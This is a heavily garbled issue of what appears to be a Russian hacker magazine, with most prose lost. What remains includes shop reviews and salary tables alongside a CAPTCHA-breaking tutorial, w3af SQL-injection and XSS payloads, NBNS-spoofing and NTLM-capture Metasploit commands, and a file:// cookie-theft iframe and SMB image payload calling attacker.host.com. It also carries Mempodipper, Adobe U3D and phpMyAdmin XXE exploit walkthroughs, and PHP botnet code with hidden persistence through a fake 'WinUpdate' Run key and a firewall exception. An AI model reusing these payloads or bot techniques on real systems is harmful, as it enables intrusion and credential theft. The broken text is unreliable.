.
. ,
.

, .


. 30 . ?
, ,
.
, ,
:
,
, .

. , . , .

, ,
. ,
, .
, , ,
. ,
, .
,
,
,
.

,
.
, Mail.ru, - , .
,
.
, ,
. :
, . :
,
,
,
. -
. , :
,
. , ,
, , ,
- .
, 2829 , .
.
.
,
.
, Greenfield Project.
, . , ,
,
.


. ,
Mail.ru, Google
.
,
.

,
,
. ,
. ,
! :)

, , -


. .


, . ,
,
.

.
,
? , . ,
,
PRUFFI ,
.
, ,
, . z



(112011)

0-3

3-5

5-10

10

Team leader

40 000 - 80 000
30 000 - 70 000 *

70 000 - 150 000


70 000 - 180 000 *

170 000 - 250 000


180 000 - 250 000 *

250 000 - ...


250 000 - ... *


Android, iOS

30 000 - 70 000
20 000 - 70 000 *

70 000 - 120 000


50 000 - 90 000 *

120 000 - 150 000


90 000 - 120 000 *

150 000 - ...


120 000 - 150 000 *

Perl/PHP

40 000 - 60 000
30 000 - 60 000 *

70 000 - 110 000


60 000 - 100 000 *

90 000 - 150 000


90 000 - 120 000 *

150 000 - ...


120 000 - 150 000 *

Ruby on Rails

30 000 - 60 000

70 000 - 100 000

100 000 - 150 000

150 000 - ...

0-3

3-5

5-10

10

Windows

30 000 - 50 000

50 000 - 70 000

80 000 - 100 000

100 000 - ...

Unix,Linux admin

30 000 - 60 000
20 000 - 60 000 *

60 000 - 90 000
60 000 - 90 000 *

90 000 - 110 000


90 000 - 110 000 *

110 000 - ...


130 000 - 150 000 *

DBA (Oracle, MySql, Postgres


..)

40 000 - 80 000
40 000 - 80 000 *

80 000 - 130 000


80 000 - 130 000 *

130 000 - 150 000


130 000 - 150 000 *

150 000 - 180 000


150 000 - 180 000 *

90 000 - 150 000


90 000 - 150 000 *

150 000 - 180 000


150 000 - 180 000 *

180 000 - 250 000


180 000 - 250 000 *

0-3

3-5

5-10

10

40 000 - 80 000
40 000 - 80 000 *

80 000 - 150 000


80 000 - 130 000 *

150 000 - 200 000


130 000 - 150 000 *

200 000 - ...


150 000 - 180 000 *

Flash-

40 000 - 80 000
40 000 - 80 000 *

80 000 - 150 000


80 000 - 150 000 *

150 000 - 200 000


150 000 - 200 000 *

200 000 - ...


200 000 - 230 000 *

Game producer

40 000 - 70 000
40 000 - 90 000 *

70 000 - 120 000


90 000 - 120 000 *

120 000 - 200 000


120 000 - 150 000 *

200 000 - ...


150 000 - 180 000 *

PRUFFI (www.pruffi.ru/analitika)

GAME

50%

50%

50%


Preview

33 .
.

PCZONE
38

?


,
-?
eBay!

.
.


.

,
.
-
.

PC ZONE

I can
crack
it!

42



CAPTCHA.
, OCR-?

70



--
,
.

48


, ,
, ,
IDS ,
w3af.

66

I CAN CRACK IT!




. .

MALWARE

76


2011
.
?

82


Windows Phone 7.5
. ?

Microsoft.


PC ZONE

(biohedge@gmail.com)


?

Android?
? , , ?
? ,
, ,
-. , ,
.

MADE IN CHINA
Made in China
, .
, ,
. ,

DealExtreme.com,
.
.


,
, .
,
.
,
, ,
-

, . ,
, . ?


FocalPrice.com
:
:
( )
:

14 25


70 000 100 (, ). , .
, ,
, .

( ),
( , ).
, , .
, eBay (-,

,
). ,
-.
,

, - ,
.
,
,
.

,

, .
,
, .
PayPal.
FocalPrice
WebMoney, .
,
,
.
, ,

.
, , , . ,
. $20,
- .
, , ,

: , , .


1. .
: retailmenot.com (,
), chinaprices.ru, . ,
< >.
2. ,
. searchsku.ru
. chinaprices.ru.
3. ,
. . , .
, ebay-forum.ru mySku.ru.
4. - (, , )
.
.
5. .
PayPal. WebMoney Qiwi, ,
, PayPal
.
6. , . ,
. , ,
- .



PayPal
WebMoney
Qiwi


PC ZONE

Dealextreme.com
:

:
:

21 40

DealExtreme.com.

- .
:
, , ,
, . :
. ,
. ,
. TinyDeal,

,
.
PayPal ,
.

-,
$15.
, :
Dealextreme ,
: ( ),

.
: .
,
, ,
().

. PayPal, WebMoney. ,
PayPal
, .
$150.
.
, ,- (, ,
). -
$35,

: ,
-
$20.
$2-3.
,
.
: , , -
,
.

Tinydeal.com
:

:
:

7 25

- ,
,

.
, ,
. -,
,
. ,
.
,

(5-7%). (
TD Points),
.

$200
-


Pandawill.com
:
:
:

25 35

-, . , ,
. , .

,


, .
(
).
Pandawill

, ,
.

.
PayPal Visa Master Card,

. . , ,

-:

$50 (
).

:
,
.


NOWSUPPLIER.COM

MERIMOBILES.COM

BUYINCOINS.COM

7 25


,
:
,
( $30 )
.
, ,
-
. , PayPal
, .

,
,
.
.
,


14 25

7 25

-
. ,
.
, 3G-
.
, PayPal ,

.

(, ,
) ,
.
.
.
,
FocalPrice
TinyDeal.

.
:
.
,
PayPal.

. :
- ,
. -
, .
: , , .
! z


PC ZONE

( gursev.kalra@foundstone.com )

CAPTCHA


CAPTCHA,
. -,
,

$1
1000 .


,


.


.

CAPTCHA
CAPTCHA
.
, , .
(,
, , ),
.
, ,

CAPTCHA: . ,
-

. Captcha- #135 #126


.
TesserCap,
CAPTCHA. , .

TESSERCAP
? ,
CAPTCHA
.
, ,
,
. -

CAPTCHA- TesserCap


, ,

, OCR-
,
. ,
,
McAfee. ?
,
.
-,

www.quantcast.com/top-sites-1.

, Wikipedia, eBay,
reCaptcha.

,
.
,
OCR-,
. TesserCap

:
1. ,

.
2.
Tesseract , CAPTCHA-.
3.
.
, ,
, .
,
.
, ,

.

. MAIN
: Main, Options,
Image Preprocessing.
,

CAPTCHA-, ( ,
),
.
URL- URL, -
. URL- :
CAPTCHA-,

URL- src <img>. , xakep.
ru www.xakep.ru/common/rateit/
captcha.asp?name=xakep.ru. ,
,
.
12 ,

. ,
. Start
Stop .



TesserCap.
.

Foundstone,
McAfee.
, ToorCon, NullCon ClubHack.
TesserCap SSLSmart.
,
.
Ruby, Ruby on Rails C#.


xakep.ru
. ,


Foundstone, ,
,

.


,



.


,
. ,
,
, .
,


Send To Image Preprocessor.

. OPTIONS

TesserCap.
OCR-,
-, , HTTP,
: ,
, ,
.
.
, OCR-.

Tesseract-ORC,
.
. , , xakep.ru , ,
. ,
? ,
,
xakep.ru ,
: Numerics.
Upper Case? ,
? , . , , ,
\Program Files\Foundstone
Free Tools\TesserCap 1.0\tessdata\configs\.
:
Numerics Lower Case,
lowernumeric, tessedit_char_whitelist.


PC ZONE
,
.

,
.
,
Http Request Headers. , - ,
. TesserCap
,
HTTP
, Accept, Cookie Referrer
. . - (Fiddler, Burp,
Charles, WebScarab, Paros . .),
Http Request
Headers. , , Follow Redirects.
, TesserCap
.
URL-
,
.
, / ,
.

.
CAPTCHA-
. CAPTCHA-,
Enable
Image Preprocessing,
OCR- Tesseract
.

. IMAGE
PREPROCESSING

.
,
.

.

.
, ,

.
.
1.

CAPTCHA-. ,
, ,
:
for(each pixel in CAPTCHA)
{
    if (invertRed is true)
        new red = 255 - current red
    if (invertBlue is true)
        new blue = 255 - current blue
    if (invertGreen is true)
        new green = 255 - current green
}


CAPTCHA-.
2.


CAPTCHA

Wikipedia

2030%

Ebay

2030%

reddit.com

2030%

CNBC

>50%

foodnetwork.com

8090%

dailymail.co.uk

>30%

megaupload.com

>80%

pastebin.com

7080%

cavenue.com

>80%

.
257
( -1 255) . RGB

:
1. -1,
.
2. -1,
(, )
. 0
, 255
. .
3. ( )
.
, .
,

:
1. Average (Red + Green + Blue)/3.
2. Human (0.21 * Red + 0.71 * Green + 0.07 *
Blue).
3. Average of minimum and maximum color
components (Minimum (Red + Green + Blue)
+ Maximum (Red + Green + Blue))/2.
4. Minimum Minimum (Red + Green + Blue).
5. Maximum Maximum (Red + Green + Blue).
CAPTCHA


.


4.

CAPTCHA-,


, .
,

Bucket Cutoff.
Passes ,
.

. :
.
TesserCap .

( ).
.
.
,
Save Mask. ,


.

Save Mask .
5.


.
20 (bucket)/.
,
0 12, 0,
,
13 25,
1 . .
,
:
1. (Leave As Is).
2. (White).
3. (Black).
, / ,
.

6. (cutoff)

.

:
if (pixels grayscale value <= Cutoff)
pixel grayscale value = (0 OR 255)
-> ,
(<= => : Set Every Pixel
with value <=/=> Threshold to 0.
Remaining to 255)

CAPTCHA
.
7: (chopping)
, , bucket- CAPTCHA

, .


PC ZONE
: ,
,
, 0 ()
255 () .
CAPTCHA , .

,
.
OCR-.

8: .
,
TesserCap ,
, CAPTCHA-
CAPTCHA,
OCR .

.
, ,
.

10:
CAPTCHA-
OCR- .
Solve
, OCR-
.
, ,
.

(Enable Image Preprocessing)

.

9:
-


for(each pixel in CAPTCHA)
    new grayscale value = 255 - current grayscale value


, ,
, - .
xakep.ru.
,
. ,
, . , (
, )
. , ,
. URL

TesserCap. , 12
, Start.
12 . ,
,
-Failed- ,
. , ,

. .
12


(Send To Image
Preprocessor).
12 , , , ,
(Character Set = Numerics).
Image Preprocessing
. ,

( , ,
) ,
. Smooth Mask
2
. Grayscale buckets
. 154 , ,
, 0, ,
, 255.
, chopping 10.
,
Solve.
714945,
711435.


, , .
, ,
.
pastebin.
com, .
xakep.ru,


(Enable Image Preprocessing).
Main , Start,
, . , ,
/ ( Mark as Correct/Mark as
InCorrect). Show Statistics. -,

CAPTCHA. , TesserCap
.

CAPTCHA-

- .


. ,
CAPTCHA-, ,
. ,
,
reCaptcha .
,
,
CAPTCHA.
API , .
(, ), .
:). z


PC ZONE

(oxdef@oxdef.info)

-

- W3AF

WARNING



.


.

w3af

-.

, ,

,
.
W3AF?
- , . , , ,
,
. , ,
. , -:
1. .
2. ().
3. .
4. .
w3af (w3af.org).
- (Web Application
Attack and Audit Framework),
.
.
, :).
,
Rapid7 ! Python, ,
, . w3af
, . , ,
Mozilla Firefox, .

W3AF?
w3af


w3af : .
,


w3af

. , ,
.
, , .
.
. W3af , .
,
. , , .
1. (
discovery-) ,
, -. . -,
webSpider. Discovery- , , , .
,
, .
2. - (
) , , XSS, SQL-, (R)LFI
.
3. Grep- , , UNIX-, . :
grep- HTTP-/,
(
, IP-,
. .).
JavaScript-, :
document.write
document.location
eval
...

DOM based XSS (www.owasp.org/index.php/


DOM_Based_XSS).
4. Bruteforce-, ,
HTTP Basic . , formLogin
,
password.
.
5. Attack- ,
. , ,
, , . -,
. ;)
6. Mangle- -


- .
UNIX,
sed, HTTP-. hidden- ? !
7. Evasion- IDS. -?
- .
8. Output- : w3af. ,

PDF, - .
9. Auth- : -,
, ,
-.
.
-,
, . , w3af
,
. w3af
auth-, .
, ,
:
SMS, .. Python!

-
, w3af,
. ,
Itter. ,
, , , ,
140 . :)
- :
LAMP (Linux-Apache-MySQL-PHP);
;

;
AJAX;
, , !


- . w3af (,
, ) :
gtkUi , GTK;
consoleUi UI (
, ).
. GUI- ./w3af_gui - 1. :
, , . .


w3af

- w3af

, ,
w3af. , ini-,
w3af, URL, , core-
. , Itter
My Profile, discovery webSpider pykto ( Nikto Python),
grep- DOM XSS
XSS- SQL-. , Start
, . , w3af Log,

. -
.
20 . ,
w3af.
DOM XSS, XSS!
, /index.php, , . Pykto, ,
Apache phpinfo- /test.php.
-
-. Apache/2.2.16 Debian GNU/
Linux PHP. ,
-, URLs -
. HTTP-,
.

Suite, Firefox Tamper Data.


( ) HTTP- - . , w3af.
, :
discovery- spiderMan;
Intercepting Proxy .

2.0
,
-.
-,
JavaScript, AJAX, JSON, HTML5 .
:)
-.
.
- /article.php?id=68,
, , ,
-. , , <Ctrl-U>,
HTML-,
JavaScript HTML.
-, .

-. ,
JS -? ,
Selenium/WebDriver?

, OWASP WebScarab Burp


spiderMan, ,
, discovery-.
. . - 127.0.0.1:44444
( FoxyProxy Firefox,
). SpiderMan
webSpider,
. spiderMan , -. Log- :
[Mon 30 May 2011 12:08:22 AM MST] spiderMan proxy is running on 127.0.0.1:44444.
Please configure your browser to use these proxy settings and navigate the target site. To exit spiderMan plugin please navigate to http://127.7.7.7/spiderMan?terminate .
[Mon 30 May 2011 12:15:29 AM MST] The user is navigating through the spiderMan proxy.
[Mon 30 May 2011 12:15:29 AM MST] Trapped fuzzable requests:
[Mon 30 May 2011 12:15:29 AM MST] http://localhost/index.php | Method: GET
[Mon 30 May 2011 12:15:32 AM MST] http://localhost/user-info.php | Method: GET
[Mon 30 May 2011 12:22:36 AM MST] SQL injection in a MySQL database was found at: "http://localhost/user-info.php", using HTTP method GET. The sent data was: "id=d'z"0". This vulnerability was found in the request with id 3911.
[Mon 30 May 2011 12:27:10 AM MST] Cross Site Scripting was found at: "http://localhost/index.php", using HTTP method GET. The sent data was: "limit=15&u=<ScRIPT>a=/UzmE/%0Aalert(a.source)</SCRiPT>". The modified parameter was "u". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 4042.

, spiderMan, , webSpider
. , - SQL XSS-! , AJAX-,
.
. W3af
, ,
. -


Exploit . SQL- sqlmap


(sqlmap.sourceforge.net), w3af.


HTTP-
: Telnet, cURL, Wget, Python + urllib,
, :) , . w3af
.
HTTP- ? !
Python. HTTP-,
HTTP-,
.
- URL MD5. , echo -n "admin" | md5sum
, . SQL-
-,
diff. , , ,
,
HTML, AJAX Python. , : , ,
JS-
. -
( ).
History HTTP . , , .
:
, , , 2xx- .
.
,
.
AJAX-
/user-info.php?id=1, . .
Audit request with... , SQL-.


SQL-

! SQL-. :) , ,
.
. PHP
, . HTTP-
-: /user-info.php?id=1 /user-info.
php?id=1%2b1,
. SQL-
,
( ).
.

OUTRO
W3af
-. ,
.
, ,
, .
, Python,
.
, , w3af , .
,
(w3af.sourceforge.net) IRC- #w3af
Freenode. z

w3af HTTP-


/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK
MSSQL

Microsoft SQL server .


.
1. Microsoft, SQL server
: integrated (sign-on), , native, , .
.
2. , ,
. , , . ,
. ,
,
arp-spoofing ? ,
- . .
f0rki (bit.ly/
sBg07r). , . , MSSQL Tabular DataStream protocol
(bit.ly/z3oVPR). . ? ?
Wireshark f0rki
: SSL ( ),
TDS. .
. TDS-,
PRELOGIN.
,
. ENCRYPTION, :


1. , : ENCRYPT_OFF 0x00.
2. : ENCRYPT_ON 0x01.
3. : ENCRYPT_NOT_SUP 0x02.
4. : ENCRYPT_REQ 0x03.

ENCRYPT_OFF. , ,
. ENCRYPT_NOT_SUP,
. ,
MiTM- ,
,
.
,
Metasploit Framework,
. , , . ,
TCP-,
MSSQL- ,
, , , . ,
, ,
arp-spoofing-,
. f0rki ,
shell-.


UI-REDRESSING

][ ,
clickjacking. ,
. clickjacking
, , uiredressing . ,
, .
, cookiejacking.
Rosario Valotta HITB 2011
. , , HTTPS-! :
IE ( ).
, -.
-, 0-day,
IE. ,
. , IE
, : Internet, Intranet,
. .
, NTLM-
Intranet . , :
Local Machine Zone
Local Intranet Zone
Trusted Sites Zone
Internet Zone
Restricted Sites Zone


- . ,
. , <iframe
src="file://c:/boot.ini">
.
0-day , -
,
. ,
:
<iframe src="file:///C://Documents and Settings/
%user_name%/Cookies/%user_name%@google[1].txt"> </iframe>

%user_name% .
, . , Google,
.
-, 0-day-,
clickjacking' content extraction ( BlackHat Europe 2010, goo.gl/Z8YNw).
? iframe ,
.
- , - ,
iframe localhost .
. drag & drop,
.
, , ,
. -
. , content extraction , ,
drag & drop. clickjacking-
, , , .


( Rosario )
(). iframe ,
.
. iframe scrollspeed
. , ,
, () iframe
. , ,
iframe,
, drag & drop', . ,
, Rosario Valotta
(bit.ly/iNxvTb), , , content extraction, JavaScript.
, .
. -,
Windows, :). XP
Vista/7 . XP C://Documents and
Settings/%user_name%/Cookies,
C:/Users/% user_name %/AppData/Roaming/Microsoft/Windows/
Cookies. , ,
User-Agent, .
,
JavaScript. -, , , ,
, .
SMB.
.

: <img src="\\attacker.host.com\any.jpg"></img>.
,
445 , web. , !
.
. 2012-, Microsoft
IE 2011-. ,
Microsoft
.
user_name@domain[counter].txt 87TVLBDW.txt.
. , ,

, IE.


/ EASY HACK

( ).

. ,
, ?
, .
,
.
,

,
. , makensi.es/stf.
-,
, , .

WordPress

DNS NETBIOS

, IP-
DNS.
( ),
. DNSSEC,
, . DNS ,
arp-poisoning,
,
. ,
- , . , , IDS, , -
. ,
.
. , XXX.COM. , , ,
Windows IP- .
IP , hosts (C:\Windows\System32\drivers\etc\hosts). ,

, DNS-. Windows , NetBIOS Name Service.


, NetBIOS Windows ,
NetBIOS Name Service (NBNS) ,
NetBIOS IP-.
WINS-, (, ).
DNS-
. , NBNS
. DNS- ,
XXX.COM DNS-?

:
(.com, .ru). ?
, , , ,
- . , ,
(, ),

. ,
DNS-

URL


NBNS-

, .
NBNS-.
Transaction ID NBNS-. ,
, , ,
. , MSF
. :
1. NetBIOS-: use auxiliary/spoof/
nbns/nbns_response.
2. : Set REGEX *google*.
3. , IP- : set spoofip xa.kep.
IP.address.
4. : run.
. (Tim Medin)
(goo.gl/Jz2Q9), NTLM-.
, ,
( makaka), (makaka.
com). Windows ( !). IE ,
. , . ,
NTLM- HTTP ( SMB):
1. : use auxiliary/server/
capture/http_ntlm.
2. , : set URIPATH.
3. , -: set SRVPORT 80.

4. : run.
. , NBNS-,
- .
c XXX.com, - ,
( JavaScript),
XXX.com. XXX.
com, ,
DNS NBNS. ,

, -
.
,
.
:
1. NBNS- .
2. web-
( ) , XXX.com (, asdasdasd.XXX.com).
3. , - , NBNS .
4. asdasdasd.XXX.com, , ,
NBNS.
5. XXX.com asdasdasd.XXX.com,
.
,
. ,
(XXX.com),
(.XXX.com).

LOCALHOST WINDOWS


localhost
127.0.0.1. ? , IE, , Windows. , Python urllib2
. , ,
(127.0.0.1)
(0.0.0.0).
- , Eldar Marcussen. ,


IE .NET framework
localhost 127.0.0.1. IE9
, -localhost.
, -, . -,
IP 127 , ,
127.1.2.3,
. -,
hosts (%windir%\drivers\etc\hosts)
localhost: 127.0.0.1 localh0st.


(ivinside.blogspot.com)
(115612, . , .1)

Linux,
, Microsoft Office Acrobat
Reader, XXE- phpMyAdmin.
!


Linux

CVSSV2

6.8
(AV:L/AC:L/AU:S/C:C/I:C/A:C)

BRIEF

/proc/<PID>/mem ( <PID>
), Linux
.
2.6.39 #ifdef,
, ,

.
, .
, .
, : ,
2.6.39,
.


EXPLOIT

/proc/<PID>/mem :
static int mem_open(struct inode* inode, struct file* file)
{
    file->private_data = (void*)((long)current->self_exec_id);
    file->f_mode |= FMODE_UNSIGNED_OFFSET;
    return 0;
}

,
. . , ( ):
static ssize_t mem_write(struct file * file,
        const char __user *buf, size_t count, loff_t *ppos)
{
    /* ... */
    struct task_struct *task = get_proc_task(
        file->f_path.dentry->d_inode);
    /* ... */
    mm = check_mem_permission(task);
    copied = PTR_ERR(mm);
    if (IS_ERR(mm))
        goto out_free;
    /* ... */
    if (file->private_data != (void *)((long)
            current->self_exec_id))
        goto out_mm;
    /* ... */

: check_mem_permission self_exec_id.
check_mem_permission __check_mem_permission, :
static struct mm_struct *__check_mem_permission(
        struct task_struct *task)
{
    struct mm_struct *mm;
    mm = get_task_mm(task);
    if (!mm) return ERR_PTR(-EINVAL);
    if (task == current) return mm;
    if (task_is_stopped_or_traced(task)) {
        int match;
        rcu_read_lock();
        match = (ptrace_parent(task) == current);
        rcu_read_unlock();
        if (match && ptrace_may_access(task,
                PTRACE_MODE_ATTACH))
            return mm;
    }
    mmput(mm);
    return ERR_PTR(-EPERM);
}

,
(task == current), , ptrace. ptrace ,
task == current.
? , suid. su:
$ su "yeeeee haw I am a cowboy"
su: user yeeeee haw I am a cowboy does not exist

, stderr ,
. , /proc/<PID>/mem,
lseek() , dup2()
/proc/<PID>/mem, ,
-. . , self_exec_id
, /proc/<PID>/mem. self_exec_id
,
.
, : fork() exec() .
self_exec_id,
. exec(), self_exec_id .
/proc/<PID >/mem,
. su
exec(), self_exec_id.
, ,

dup2 -> exec.
, . , ASLR
, :
$ readelf -h /bin/su | grep Type
  Type:                              EXEC (Executable file)

, su .text ( DYN, EXEC).


, su
PIE, , ASLR .text , .
Mempodipper exploit-db.com,
EDB-ID 18411. .
TARGETS

Linux >=2.6.39, 32- 64-.


SOLUTION
Mempodipper


MS12-005

CVSSV2

9.3
(AV:N/AC:M/Au:N/C:C/I:C/A:C)

BRIEF


.
web- Office.
Object Packager.
, Object Packager ClickOnce- ,
Office.
, . , ClickOnce
, Windows, .
ClickOnce: -,
, -.

, ,
, -
. ClickOnce
,
.

PowerPoint. Custom Animation OLE-.
,
OLE ( Object Actions): Activate
Contents ( ) Edit Package (
). Activate Contents ,
.
, Custom Animation -

,
ClickOnce- (Full Trust).

.
. Custom Animation ,
PowerPoint . PowerPoint , .
ClickOnce-
, .
EXPLOIT

, MS12-005, :
1. .
packager.dll , ,
( execExtTable).
.text:02FA1D98 execExtTable dd offset a_exe ; DATA XREF: CPackage::_GetCurrentIcon(_IC *)+69|o
.text:02FA1D98                              ; CPackage::_GiveWarningMsg(HWND__ *)+5E|o
.text:02FA1D98                              ; ".exe"
.text:02FA1D9C dd offset a_com ; ".com"
.text:02FA1DA0 dd offset a_bat ; ".bat"
.text:02FA1DA4 dd offset a_lnk ; ".lnk"
.text:02FA1DA8 dd offset a_cmd ; ".cmd"
.text:02FA1DAC dd offset a_pif ; ".pif"
.text:02FA1DB0 dd offset a_scr ; ".scr"
.text:02FA1DB4 dd offset a_js ; ".js"
.text:02FA1DB8 dd offset a_jse ; ".jse"
.text:02FA1DBC dd offset a_vbs ; ".vbs"
.text:02FA1DC0 dd offset a_vbe ; ".vbe"
.text:02FA1DC4 dd offset a_wsh ; ".wsh"
.text:02FA1DC8 dd offset a_sct ; ".sct"
.text:02FA1DCC dd offset a_vb ; ".vb"
.text:02FA1DD0 dd offset a_wsc ; ".wsc"

Python-


.text:02FA1DD4 dd offset a_wsf ; ".wsf"


.text:02FA1DD8 dd offset a_wmz ; ".wmz"

,
, .
IsProgIDInList:
.text:02FA72F4 push 11h ; int
.text:02FA72F6 push offset execExtTable ; dangerousTable
.text:02FA72FB push esi ; pExtName
.text:02FA72FC push 0 ; int
.text:02FA72FE call ?IsProgIDInList@@YGHPBG0PBQBGI@Z
; IsProgIDInList(ushort const *,ushort const *,
; ushort const * const *,uint)

,
.
py pl. MS12-005 AssocIsDangerous(),
:

A , .
PO , , 3D-.

.text:02FA6A11 push eax


.text:02FA6A12 call ds:__imp__AssocIsDangerous@4
; AssocIsDangerous(x)
.text:02FA6A18 test eax, eax
.text:02FA6A1A jnz short loc_2FA6A42

EXPLOIT

2. .
packager.dll ,
. CPackage___
GiveWarningMsg(HWND hWnd).
execExtTable, ,
execExtTable, .
TARGETS

Windows XP, Windows Vista, Windows Server 2008 SP2, Windows 7.


SOLUTION

, .

Adobe Reader
U3D-

CVSSV2

3D- pdf-

10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)

:
4 OpenAction
JavaScript.
14 JavaScript 15.
15 JavaScript- heap spraying,
.
11 3D- .
10 3D-, (,
).
, :
10 (/3D, /U3D).
11 (/3DI, /3DD, /3D,
/3DA).
15 JavaScript- heap
spraying (
3D-).
Metasploit (
):

BRIEF

U3D-.
.

. DEP ROP-,
icucnv36.dll. ASLR JavaScript-, heap spraying.
U3D-, ,
:
U3D 3D-.
3DD () 3D-,
.
3DA () , ,
3D-.
3DI () , . true
, false JavaScript.
DIS () , 3D-
.


msf > use exploit/windows/fileformat/adobe_reader_u3d


msf exploit(adobe_reader_u3d) > set payload windows/exec
payload => windows/exec
msf exploit(adobe_reader_u3d) > set cmd calc.exe
cmd => calc.exe
msf exploit(adobe_reader_u3d) > show options
Module options (exploit/windows/fileformat/adobe_reader_u3d):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILENAME   msf.pdf          yes       The file name
   OBFUSCATE  false            no        Enable JS obfuscation
Payload options (windows/exec):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc.exe         yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh,thread,process,none
Exploit target:
   Id  Name
   --  ----
   0   Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3
msf exploit(adobe_reader_u3d) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /home/pikofarad/.msf4/local/msf.pdf

Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 Windows XP SP3.


SOLUTION

, .

LFI phpMyAdmin XXE-

CVSSV2

>
<foo>&bar;</foo>

bar, /etc/
passwd,
. , XML-
.
, . :

TARGETS

[
<!ELEMENT foo ANY >
<!ENTITY bar SYSTEM "file:///etc/passwd" >
]

5.0
(AV:N/AC:L/Au:N/C:P/I:N/A:N)

BRIEF

Marco Batista
Local File Including.
, XXE- (XXE XML eXternal Entity),
XML-.
, XML- (, GET -) XML.
xmlDB, :
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
  <user>
    <username>gandalf</username>
    <password>!c3</password>
    <userid>0</userid>
    <mail>gandalf@middleearth.com</mail>
  </user>
  <user>
    <username>Stefan0</username>
    <password>w1s3c</password>
    <userid>500</userid>
    <mail>Stefan0@whysec.hmm</mail>
  </user>
  <user>
    <username>tony</username>
    <password>Un6R34kb!e</password>
    <userid>500</userid>
    <mail>s4tan@hell.com</mail>
  </user>
</users>

SQL, XXE. XML


(entities), DTD. ,
(external entities).
URI, . , URI
, , , :

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo
[
  <!ELEMENT foo ANY>
  <!NOTATION GIF SYSTEM "http://my-cool-site.com/ShowGif.exe">
  <!ENTITY bar SYSTEM "http://not-my-cool-site.com/bar.gif" NDATA GIF>
]
>
<foo>&bar;</foo>

ShowGif.exe bar.gif. XML-


. XML- OWASP
(goo.gl/B8G9C).
EXPLOIT

phpMyAdmin
XML-. , XML- ( -)
.
libraries\import\xml.php,
simplexml_load_string() :
$xml = simplexml_load_string($buffer,
"SimpleXMLElement", LIBXML_COMPACT);

phpMyAdmin
libxml_disable_entity_loader(), XML-.
SECFORCE Metasploit . LFI :
1. phpMyAdmin .
2. XML-, XXE-
.
3. XML-.
4. .
.
TARGETS

PhpMyAdmin 3.4.x 3.4.7.1 3.3.x 3.3.10.5.


SOLUTION

<?xml version="1.0" encoding="utf-8"?>


<!DOCTYPE foo


phpMyAdmin 3.4.7.1 (3.3.10.5)


. z


>> coding

|qbz| (http://essenzo.net)

PHP-
Windows


.
- C, ASM, - Python. ,
,

PHP. ,

,
.
,
,
- .

WWW
bit.ly/WdbrO

;
3.14.by/ru/md5

;
www.f2ko.de
.

DVD



,
.

DO U SPEAK ENGLISH? NO, PHP


, XSS,
. , ,
-, .
.
-,
. .
, .
, , .
.
, - , . 20
- .
.
.


PHP- Windows

. ,
? ,
, , . , php2exe-.



. , , . , ,
.
, ,
. , , ,
, .
, .
. ,
,
.
, ,
.
, . ,
, ,
(), .
,
, exe,
.
:
md5. { } { } { }


( = ),
, ,
. ,
, ,
- .
:


function mySettings()
{
$settings = file_get_contents(
'http://adres.com/?do=mysettings');
if ($settings != '')
{
list($status, $statusdata) =
explode('|', $settings, 2);
$config = array('status' => $status,
'data' => $statusdata);
return $config;
}
else
return false;
}

, , ,
, , |.
, .
():
function bruteHashes($hashes)
{
//
file_put_contents('./brute.txt', implode("\r\n", $hashes));
// ,
file_get_contents(
'http://adres.master.servera.com/?do=iamworking');
//
passthru('md5.exe brute.txt vocabulary.txt results.txt');
//
$uploader = ftp_connect('ftp://adres.master.servera.com');
ftp_login($uploader, 'login', 'password');
ftp_put($uploader, './results/'.time().'.txt',

063


'./results.txt', FTP_ASCII);
ftp_close($uploader);
// ,
file_get_contents(
'http://adres.master.servera.com/?do=iamfinished');
}

,
,
,
. ,
. ,
,
(- ), , .
, ,
. .
, :
function installVocab()
{
$vocabulary = file_get_contents(
'http://adres.com/unique_vocabulary.php');
file_put_contents('./vocabulary.txt', $vocabulary);
}

. , ,
,
:

, , ,
.
,
-.
,
-.
,
( ):
brute ;
clean ,
;
install ;
exit .
.
- 300 .
.
, , ( )

if (!file_exists('./vocabulary.txt'))
{
installVocab();
}
startScheduler();

, ,
exe. Bambalam PHP EXE
Compiler/Embedder.
, exe PHP. , , ( !).
PHP 4.0,
. Bambalam :
bamcompile [-options] infile.php [outfile.exe]

PHP DevelStudio
bit.ly/amiS4r

PHP
.

,
,

.


Php2exe
bit.ly/ylV4vR

PHP
.

,


php5ts.dll.

Bambalam Embedder
bit.ly/wpSniZ.
,
GUI
.


,
cURL.

py2exe
bit.ly/3KkIKw

,
, .

,
,

.

Perl2Exe
bit.ly/y29qTB

exe.

,


.


MD5-

, . . -,
,
, , , .
IP- (
,
, ,
NAT), ,
.
. , , ,
lastcallback. , ,
. ,
.
300 (
), ,
. . ,
, , , , |.
, ,
,
. ,
- install|vocab_123123123.txt, install
, vocab_123123123.txt
, .
, , clean. brute.

:

results,
.


.
-, ,
, ,
, .
,
: %CD%\bot.exe.
BAT To EXE Converter 1.5
, invisible
application include : bot., (php5ts.dll) (md5.exe).
, . , .
. , , attrib
'+h' '+s'. :
attrib "%CD%\bot.exe" +h +s

.
NTFS :
cd %systemroot%\system32
type packed_bot.exe>calc.exe:b0t.exe

:
brute|c4ca4238a0b923820dcc509a6f75849b:
c81e728d9d4c2f636f067f89cc14862c:eccbc87e4b5ce2fe28308f
d9f2a7baf3

FTP-,
, .
results.
, iamfinished.

cd "%systemroot%\system32
start .\calc.exe:b0t.exe

FTP.
Windows , :
passthru('netsh firewall add allowedprogram %WINDIR%\
system32\ftp.exe TCPInfrastructure>nul 2>&1 ');

exe ( , ,
%systemroot%):
passthru('reg add HKLM\software\microsoft\windows\
currentversion\run /v WinUpdate /t REG_SZ /d
%WINDIR%\packed_bot.exe /f>nul 2>&1');


PHP , .
,
, , ,
. z


plaintext (first@plaintext.su, http://www.plaintext.su)

I can
crack
it!

-,



][-,
. , ,

.


DVD


Can You
Crack It?.


,

,

,
.
, (GCHQ)

Google, ,
, .

FIRST STEP
,
canyoucrackit.co.uk,
